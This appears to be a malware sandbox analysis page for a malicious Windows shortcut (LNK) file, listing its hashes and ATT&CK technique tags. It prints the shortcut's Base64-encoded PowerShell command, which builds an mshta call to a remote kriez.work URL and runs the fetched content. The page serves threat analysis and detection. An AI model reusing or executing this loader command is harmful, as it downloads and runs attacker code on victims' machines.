Malicious
Malicious

d417f07b8eac10d7e14bacae56002256

LNK File
|
MD5: d417f07b8eac10d7e14bacae56002256
|
Size: 1.34 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d417f07b8eac10d7e14bacae56002256
Sha1
244452034b44ea99af6dc2217546987898f7a3f4
Sha256
2feda833dd94e3ff4a1c549814deb6552e162f36023a7aa400104ed528a1e190
Sha384
9a8588ff1dfd33603ab4ab6f966480670e688b010c09597d99d22c74fcc10a28c83b742404aa344521470ddfa2d4dbca
Sha512
e2b2d061dbb56b4ff8f3ef5f117c600e1464f798a48b195a4aef89db2267ca32b68624bb7fca2ef4f0582836cce755bdbe1b01a7c90c621db74e1cb25704ddd0
SSDeep
24:8hp/BHYVKVWf+/CWfO0lZseWrN8RqDcCB4PYP+uBarab7Z:8X5a4Tw3JDDc4gFA4aZ
TLSH
542138140EE20250E1B787757BFDB722C876BC95D95A9BE9014085405B34250F8F5F3F
File Structure
d417f07b8eac10d7e14bacae56002256
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
d417f07b8eac10d7e14bacae56002256 (1.34 KB)
File Structure
d417f07b8eac10d7e14bacae56002256
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==

Malicious

d417f07b8eac10d7e14bacae56002256
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAG0AcwBoAHQAYQAgACcAOwAoAGcAYwBiACkAIAArACAAJwBoAHQAdABwAHMAOgAvAC8AawByAGkAZQB6AC4AdwBvAHIAawAvAFQAYQB3AGwAZQB5AC4AbQBwADQAJwAgAHwAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="

Malicious

d417f07b8eac10d7e14bacae56002256 > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙